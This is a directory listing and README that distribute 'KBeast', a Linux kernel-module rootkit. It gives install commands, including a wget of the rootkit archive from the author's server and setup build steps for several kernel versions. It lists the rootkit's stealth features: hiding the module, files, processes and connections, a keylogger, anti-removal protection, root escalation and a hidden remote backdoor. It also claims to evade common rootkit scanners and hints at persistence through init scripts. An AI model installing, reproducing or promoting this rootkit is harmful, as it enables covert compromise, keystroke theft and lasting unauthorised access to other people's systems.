Index of /rootkit/kernel-rootkit/kbeast-v1/

    Name                     Last modified        Size
    
    Parent Directory         30-Mar-2012 04:22    -
    init/                    31-Dec-2011 17:32    -
    LICENSE                  01-Jan-2012 16:37    4k
    Makefile                 27-Dec-2011 04:38    4k
    bd-ipsecs-kbeast-v1.c    28-Dec-2011 18:30    4k
    config.h                 27-Dec-2011 19:57    4k
    ipsecs-kbeast-v1.c       01-Jan-2012 16:37    20k
    ipsecs-kbeast-v1.cc1     27-Dec-2011 19:57    20k
    setup                    28-Dec-2011 18:30    8k

KBeast (Kernel Beast) is a new kernel rootkit based on a publicly known rootkit, 
modified to support kernels 2.6.16, 2.6.18, 2.6.32, and 2.6.35. 
It should actually work for kernel 2.6.18 up to 3.x.x or later, but our installer 
script is only written for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are the quick 
steps for installing the beast:

    > wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
    > tar zxvf ipsecs-kbeast-v1.tar.gz
    > cd kbeast-v1/
    > modify config.h to meet your requirements; remember that _MAGIC_NAME_ 
      must be a user with an sh/bash shell
    > In order to install on kernel 2.6.16 or 2.6.18, execute ./setup build 0
    > In order to install on kernel 2.6.32 or 2.6.35, execute ./setup build 
      (it should actually work for recent kernels as well)
    > In order to install on kernel 2.6.9, edit the .cc1 file to remove all sys_unlinkat() 
      related code, set the syscall table address manually, then execute ./setup build 0

Please note that the beast has been tested on, but is not limited to, kernels 2.6.9, 
2.6.16, 2.6.18, 2.6.32, and 2.6.35 (i386 or x86_64). The features of this rootkit are:

    > Hiding this loadable kernel module
    > Hiding files/directory
    > Hiding process (ps, pstree, top, lsof)
    > Hiding socket and connections (netstat, lsof)
    > Keystroke logging to capture user activity
    > Anti-kill process
    > Anti-remove files
    > Anti-delete this loadable kernel module
    > Local root escalation backdoor
    > Remote binding backdoor hidden by the kernel rootkit

During my test with chkrootkit and rkhunter, this rootkit wasn't detected by 
those rootkit hunters. The limitation of my rootkit is that you have to work out yourself how to 
load the rootkit when the server reboots. Believe me, that is an easy task; please see the 
modification of the init script here as an example. Finally, you can download the kernel 
beast on core.ipsecs.com.

See Nightmare for Linux System Administrator, and Happy New Year 2012!